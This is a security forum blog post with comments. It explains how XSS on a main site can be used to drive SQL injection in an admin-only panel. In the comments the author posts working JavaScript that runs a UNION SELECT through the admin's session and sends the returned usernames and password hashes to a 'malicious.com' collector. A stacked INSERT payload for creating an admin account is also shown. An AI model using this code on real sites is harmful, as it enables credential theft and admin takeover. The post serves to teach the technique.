SQL Injection Via XSS

    One of the G4H members, mandi, from Garage4hackers Forums - Home (my second home) asked a few days ago about an XSS-to-SQLi attack. He had a scenario where the main site has a cross-site scripting vulnerability and the admin panel has SQL injection. The page with the SQL injection in the admin panel is only accessible to the admin. The question was: is it possible to use the XSS on the main site to exploit the SQL injection in the admin panel and get the admin account pwned?

    Here is my answer, with the following scenario:

    There is a main site which is vulnerable to an XSS flaw (reflected or stored). The same site has an admin panel which is only accessible to admin users, and one of its authenticated pages is vulnerable to SQL injection. The admin panel can be a separate package such as cPanel, in which case the SQL injection vulnerability may already be published (exploit-db FTW!!!).

    This is how we can pwn the admin account using SQL injection via XSS:
    1. The attacker crafts an XSS payload which uses AJAX to make a request carrying the SQL injection payload.
    2. He sends the payload link to the admin user.
    3. When the admin user is logged in to the admin panel and clicks the attacker's link, the request goes out from the admin's own browser, in the site's origin, so it carries the admin's session. The SQL injection in the admin page is exploited and returns the usernames and password hashes from the admin table.
    4. The attacker's script then submits the returned data to his site using AJAX, and he cracks the password hashes offline.

    Video Demonstration:


    Any suggestions, comments are welcome.

    AMol NAik
    This article was originally published in blog: SQL Injection Via XSS started by amolnaik4
    Comments (4)

    41.w4r10r:

      Hey Amol, how about sharing your AJAX script...
      Also, can we include a few more attack vectors in this script? As we already know, we can use an INSERT query and insert an admin user instead of going through the long process of cracking the hash...
    amolnaik4:
      Hey 41.w4r10r,

      Here is the AJAX script used in the video:
      Code:
      var url = "http://mysite.com/admin/index.php?page=vuln&id=1'+UNION+ALL+SELECT+user,password+from+users-- -";

      // Runs in the victim's browser in the main site's origin, so the admin's
      // session cookies are sent with this request automatically.
      var xmlhttp = new XMLHttpRequest();
      xmlhttp.open("GET", url, true);

      xmlhttp.onreadystatechange = function() {
          if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
              sendtoattacker(xmlhttp.responseText);
          }
      };

      xmlhttp.send();

      function sendtoattacker(data) {
          // encodeURIComponent so the whole page body survives in the query string
          var myurl = "http://malicious.com/collect.php?log=" + encodeURIComponent(data);
          var xhr = new XMLHttpRequest();
          xhr.open("GET", myurl, true);
          // the handler belongs on xhr, not on xmlhttp
          xhr.onreadystatechange = function() {
              if (xhr.readyState == 4 && xhr.status == 200) {
                  alert("Pass2");
              }
          };
          xhr.send();
      }
      Yes, we can include all SQLi attacks using this. We just need to change the AJAX script accordingly.

      But with MySQL-PHP, we can't use stacked SQL queries, so it's not possible to use INSERT/UPDATE in this case:
      Code:
      http://mysite.com/admin/index.php?page=vuln&id=1';INSERT INTO users values('10','newadmin','newpass');-- -
      It may be possible on other platforms.

      AMol NAik
    Angel--D3m0n:
      Please share all attachments (collect.php and user_pass.html). I'm waiting..... Thanks
    amolnaik4:
      Angel--D3m0n,

      'collect.php' is a simple file which takes the input and writes it into the 'user-pass.html' file. I'd suggest you create one for yourself so that you learn PHP as well.

      Here are the few steps 'collect.php' should do:
      1. Collect the input via a GET parameter.
      2. Open a file for writing.
      3. Write the collected content into the previously opened file.
      4. Close the file.

      Do some googling for syntax and examples. php.net is a great source too.

      AMol NAik